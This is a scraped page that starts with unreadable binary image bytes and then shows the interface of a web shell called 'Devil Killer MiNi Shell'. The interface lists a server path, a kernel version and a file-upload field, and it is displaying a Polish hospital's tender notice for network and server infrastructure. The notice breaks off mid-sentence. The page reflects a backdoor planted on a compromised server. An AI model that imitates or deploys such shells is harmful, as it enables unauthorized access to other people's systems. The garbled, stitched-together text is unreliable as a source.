JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240412/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240412/0028414201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa instalacja i konfiguracja infrastruktury sprzętowo-sieciowej w Szpitalu Mazowieckim w Garwolinie Sp. z o.o. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SZPITAL MAZOWIECKI W GARWOLINIE SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 142032872</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Legionów 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Garwolin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">08-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sylwia.laczynska@smwg.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.smwg.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Spółka z ograniczoną odpowiedzialnością </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa instalacja i konfiguracja infrastruktury sprzętowo-sieciowej w Szpitalu Mazowieckim w Garwolinie Sp. z o.o. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3c035009-f8ab-11ee-b016-82aaee56c84c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00284142</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://smwg.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji<br/>elektronicznej za pośrednictwem Platformy zakupowej dostępnej pod adresem https://smwg.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Niezbędne wymagania sprzętowo-aplikacyjne umożliwiające pracę na Platformie:<br/>1.1.	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>1.2.	komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>1.3.	zainstalowana dowolna przeglądarka internetowa obsługująca min. TLS 1.2, najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>1.4.	włączona obsługa JavaScript;<br/>1.5.	zainstalowany program Acrobat Reader, pakiet office lub inny obsługujący pliki w formacie pdf i docx.<br/>2.	Ogólne zasady korzystania z Platformy:<br/>2.1.	zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie; https://smwg.ezamawiajacy.pl lub https://oneplace.marketplanet.pl<br/>2.2.	wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestruj się”.<br/>2.3.	rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej. Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu.<br/>2.4.	po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem Platformy. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”.<br/>3.	Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu elektronicznego:<br/>3.1.	zaleca się podpisywać dokumenty w formacie „pdf&#34; używając formatu PAdES.<br/>3.2.	dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będą wymagane dwa dokumenty podpisywany i oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć prócz podpisywanego dokumentu oddzielny plik z podpisem.<br/>4.	Zamawiający dopuszcza przesyłanie danych w formatach dopuszczonych odpowiednimi przepisami prawa aby spełnić formułę pisemności i niezaprzeczalności oraz powszechnie obowiązujących w pracy biurowej, tj. txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, PAdES, ASIC, XMLenc. Maksymalny rozmiar pojedynczego pliku to 100 MB, przy czym nie określa się limitu liczby plików.<br/>5.	Dokumentacja przedmiotowego postępowania dostępna jest na Platformie w sekcji „Dokumenty zamówienia”. Pobranie pojedynczego dokumentu lub wszystkich dokumentów następuje po kliknięciu polecenia „Pobierz”.<br/>6.	Ofertę wraz z załącznikami należy wczytać jako załączniki na Platformie, według Instrukcji korzystania z Platformy.<br/>7.	Zamawiający nie przewiduje komunikowania się z wykonawcami w sposób inny niż przy użyciu środków komunikacji elektronicznej wskazanych w niniejszej SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zostały określone w Rozdziale XXVI SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zostały określone w Rozdziale XXVI SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PP/4/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest dostawa instalacja i konfiguracja infrastruktury sprzętowo-sieciowej w Szpitalu Mazowieckim w Garwolinie Sp. z o.o. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32420000-3 - Urządzenia sieciowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48822000-6 - Serwery komputerowe</p> <p class="mb-0">48780000-9 - Pakiety oprogramowania do zarządzania systemem, przechowywaniem i zawartością</p> <p class="mb-0">48620000-0 - Systemy operacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">45 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wdrożenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	warunki udziału w postępowaniu dotyczące zdolności technicznej i zawodowej, tj.:<br/>1.1.	w zakresie doświadczenia podmiotu:<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca posiada niezbędną wiedzę i doświadczenie do wykonania zamówienie i wykaże się realizacją, w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej:<br/>a)	jednego zamówienia, o wartości co najmniej 450 000,00 zł brutto (słownie: czterysta pięćdziesiąt tysięcy złotych), którego przedmiotem była:<br/>	dostawa, instalacja i konfiguracja sprzętu serwerowego i systemów operacyjnych (serwery, serwerowe systemy operacyjne);<br/>b)	jednego zamówienia, o wartości co najmniej 450 000,00 zł brutto (słownie: czterysta pięćdziesiąt tysięcy złotych), którego przedmiotem była:<br/>	dostawa, instalacja i konfiguracja sprzętu i oprogramowania do wykonywania kopii zapasowych (serwery, urządzenia do przechowywania danych – macierze lub napędy LTO, usługa chmurowego przechowywania danych, oprogramowanie do wykonywania kopii zapasowych);<br/>c)	zamówienia zostały zrealizowane na rzecz jednostki ochrony zdrowia;<br/>Przez jednostkę ochrony zdrowia Zamawiający rozumie się podmiot wpisany do Rejestru Podmiotów Wykonujących Działalność Leczniczą.<br/>d)	co najmniej jedno z przedstawionych zamówień polegało na wdrożeniu infrastruktury hiperkonwergentnej, tj. integrującej technologji, łączącej funkcjonalne obszary centrum danych takie jak: pamięć masowa, przetwarzanie danych i wirtualizację.<br/>UWAGA!!!<br/>Wykonawca wskaże dokładną nazwę zrealizowanego zamówienia, która pozwoli na jednoznaczną identyfikację zamówienia, że szczegółowym wskazaniem zakresów funkcjonalnych potwierdzających spełnienie warunku udziału w postępowaniu. Zamawiający dopuszcza jedynie wykazywanie zamówień ostatecznie zakończonych i odebranych, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców na kolejnym etapie z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie.<br/>1.2.	w zakresie osób skierowanych do realizacji zamówienia:<br/>Wykonawca biorący udział w postępowaniu musi wykazać, że dysponuje/będzie dysponował zespołem projektowym, w skład, którego wchodzić będzie:<br/>a)	co najmniej jedna osoba na stanowisku Kierownik Projektu z wykształceniem wyższym magisterskim, posiadający certyfikat zarządzania projektami np. Prince II lub inny równoważny, wydany przez niezależną jednostkę akredytowaną do wydawania tego typu certyfikatów;<br/>b)	co najmniej jedna osoba na stanowisku konsultant wdrożeniowy ds. bezpieczeństwa sieciowego przypisany do tego projektu z co najmniej 5 letnim doświadczeniem wdrożeniowym. Osoba w okresie ostatnich 5 latach powinna się wykazać doświadczeniem wdrożeniowym w co najmniej jednym projekcie informatycznym, dotyczącym wdrożenia w jednostce ochrony zdrowia; posiadać certyfikat techniczny producenta firewalli Fortinet Fortigate 60F (w posiadaniu zamawiającego) potwierdzający znajomość konfiguracji rozwiązania co najmniej na poziomie profesjonalisty; posiadać certyfikat producenta firewalli Fortinet Fortigate 60F potwierdzający umiejętność projektowania rozwiązań bezpieczeństwa opartych sprzęt security Fortinet Fortigate60F;<br/>c)	co najmniej dwóch osób w roli konsultant wdrożeniowy sprzętu serwerowego przypisany do tego projektu z co najmniej 5 letnim doświadczeniem wdrożeniowym. Osoby te w okresie ostatnich 5 latach powinny się wykazać doświadczeniem wdrożeniowym w co najmniej jednym projekcie informatycznym, dotyczącym wdrożenia w jednostce ochrony zdrowia; posiadać certyfikat techniczny producenta sprzętu serwerowego potwierdzający znajomość dostarczanego rozwiązania;<br/>d)	co najmniej dwie osoby w roli konsultant wdrożeniowy sprzętu sieciowego przypisany do tego projektu z co najmniej 5 letnim doświadczeniem wdrożeniowym. Osoby w okresie ostatnich 5 latach powinny się wykazać doświadczeniem wdrożeniowym w co najmniej jednym projekcie informatycznym, dotyczącym wdrożenia w jednostce ochrony zdrowia; posiadać certyfikat techniczny producenta oferowanego sprzętu sieciowego potwierdzający znajomość techniczną oferowanych Przełączników; posiadać certyfikat producenta oferowanego sprzętu sieciowego potwierdzający umiejętność projektowania rozwiązań opartych o sprzęt sieciowy producenta oferowanego rozwiązania co najmniej na poziomie profesjonalisty (design professional lub równoważny);<br/>e)	co najmniej jednej osoby w roli konsultant wdrożeniowy wirtualizacji przypisany do tego projektu z co najmniej 5 letnim doświadczeniem wdrożeniowym. Osoba w okresie ostatnich 5 latach powinna się wykazać doświadczeniem wdrożeniowym w co najmniej jednym projekcie informatycznym, dotyczącym wdrożenia w jednostce ochrony zdrowia; posiadać certyfikat techniczny producenta oferowanego oprogramowania do wirtualizacji potwierdzający znajomość rozwiązania w zakresie hiperkonwergencji oraz certyfikat techniczny potwierdzający znajomość klasycznych rozwiązań wirtualizacyjnych Vmware (użytkowane przez Zamawiającego);<br/>f)	co najmniej jednej osoby w roli Architekt systemów informatycznych – przypisany do tego projektu z co najmniej 5 letnim doświadczeniem projektowym. Osoba w okresie ostatnich 5 latach powinna się wykazać doświadczeniem w zakresie projektowania (tworzenia) architektury systemów informatycznych; w zakresie projektowania architektury: systemów zorientowanych na usługi, systemów o wysokiej wydajności i niezawodności, systemów wykorzystujących bazy danych; posiadającej certyfikat architektury korporacyjnej w zakresie IT potwierdzający znajomość kompleksowego podejścia do projektowania, planowania, implementacji oraz zarządzania informacyjną architekturą organizacji.<br/>UWAGA 1 – Jedna osoba może pełnić więcej niż jedną funkcję. <br/>UWAGA 2 – Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – nie dopuszcza łącznego spełnienia warunku przez Wykonawców.<br/>UWAGA 3 – Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia<br/>UWAGA 4 – Zamawiający przez jednostkę ochrony zdrowia rozumie podmiot znajdujący się w rejestrze https://rpwdl.ezdrowie.gov.pl <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	W celu wykazania niepodleganiu wykluczeniu w postępowaniu na podstawie art. 125 ust. 1 ustawy Pzp, Wykonawca składa wraz z ofertą oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu – Załącznik nr 4 do SWZ – w postaci elektronicznej opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym;<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców oświadczenie, o którym mowa powyżej, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie te ma potwierdzać brak podstaw wykluczenia w postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje brak postaw wykluczenia.<br/>3.	oświadczenia Wykonawcy w zakresie art. 108 ust. 1 pkt 5 Pzp o braku przynależności do tej samej grupy kapitałowej, zgodnie z Załącznikiem nr 5 do SWZ.<br/>4. oświadczenie o aktualności, złożonego wraz z ofertą oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp zgodnego ze wzorem stanowiącym Załącznik nr 8 do SWZ.<br/>5.	odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, sporządzony nie wcześniej niż 3 miesiące przed złożeniem oferty, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, lub równoważnego zagranicznego;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. a)	wykaz wykonanych dostaw/zrealizowanych zamówień – jedno zamówienie, o wartości zamówienia co najmniej 450 000,00 zł brutto (słownie: czterysta pięćdziesiąt tysięcy złotych), którego przedmiotem była:<br/>- dostawa, instalacja i konfiguracja sprzętu serwerowego i systemów operacyjnych (serwery, serwerowe systemy operacyjne);<br/>b)	jedno zamówienie, o wartości zamówienia co najmniej 450 000,00 zł brutto (słownie: czterysta pięćdziesiąt tysięcy złotych), którego przedmiotem była:<br/>-	dostawa, instalacja i konfiguracja sprzętu i oprogramowania do wykonywania kopii zapasowych (serwery, urządzenia do przechowywania danych – macierze lub napędy LTO, usługa chmurowego przechowywania danych, oprogramowanie do wykonywania kopii zapasowych);<br/>c)	zamówienia zostały zrealizowane dla jednostki ochrony zdrowia;<br/>d)	co najmniej jedno z przedstawionych zamówień polegało na wdrożeniu infrastruktury hiperkonwergentnej.<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, przedstawienie dowodów określających czy te dostawy zostały należycie wykonane. Przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonane, lub inne potwierdzające wykonanie umowy np. dowody zapłaty z dokumentami księgowymi, Protokoły odbiorów, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenia wykonawcy, zgodnie z Załącznikiem nr 6 do SWZ.<br/>2.	wykazu osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego opisanego w SWZ wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami; przedstawienie dowodów potwierdzających posiadane kwalifikacje i doświadczenie zgodnie z Załącznikiem nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. specyfikacje oferowanych rozwiązań sprzętowych i programowych wraz z kartami katalogowymi producentów. Specyfikacja będzie załącznikiem do końcowego protokołu odbioru. Jakakolwiek rozbieżność w konfiguracji sprzętowej w stosunku do załączonej specyfikacji skutkować będzie odmową podpisania protokołu odbioru zamówienia i podstawą do naliczania kar umownych <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Oferta powinna zawierać:<br/>1. Sporządzony w języku polskim przez Wykonawcę, zgodnego z treścią wzoru stanowiącego Załącznik nr 1 do Specyfikacji, Formularz ofertowy.<br/>2. przedmiotowe środki dowodowe wraz z ofertą: specyfikacji ofertowanych rozwiązań sprzętowych i programowych wraz z kartami katalogowymi producentów. <br/>3. Oświadczenie Wykonawcy art. 125 ust. 1 Pzp stanowiące Załącznik nr 4 do SWZ;<br/>4. dokument potwierdzający umocowanie do reprezentowania Wykonawcy lub Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia (np. odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru) – oryginał w postaci dokumentu elektronicznego albo cyfrowe odwzorowanie dokumentu papierowego opatrzone 